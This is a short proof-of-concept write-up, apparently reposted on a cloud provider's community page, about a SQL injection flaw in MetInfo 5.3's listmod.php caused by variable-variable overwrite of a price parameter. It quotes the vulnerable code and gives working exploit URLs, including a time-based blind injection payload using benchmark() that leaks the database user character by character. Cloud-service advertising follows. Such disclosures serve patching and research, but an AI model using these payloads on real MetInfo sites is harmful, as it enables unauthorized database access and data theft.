MetInfo latest SQL Injection
See
MetInfo5.3/include/global/listmod. php
Lines 164-184
foreach($dbparaname as $key=>$val2){$prices1="paraprice_".$val2['id'];$prices=$$prices1;var_dump($prices);if($prices){if(!strstr($prices, "-")){preg_match('/([0-9\.]+)/',$prices,$result);$results=$result[0];$serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $results) "; $serchpage .= "&".$prices1."=".trim($$prices1);}else{//echo 3;$prices_sql=explode('-',$prices);preg_match('/([0-9\.]+)/',$prices_sql[1],$result);$results=$result[0];$serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $prices_sql[0] and $met_plist.info < $results) "; $serchpage .= "&".$prices1."=".trim($$prices1);}}}
Where
$prices_sql[0]
No initialization or single quotes. It causes SQL injection, but there is a logical judgment above.
First, there is a variable overwrite.
$prices=$$prices1;
And
paraprice_".$val2['id']
We can control it.
You only need to construct the following url.
http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1¶price_14=tomato-xxxx&mdname=product
View mysql Log
Then construct exp
http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1¶price_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23-xxxx&mdname=product
Injection successful
Filter
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
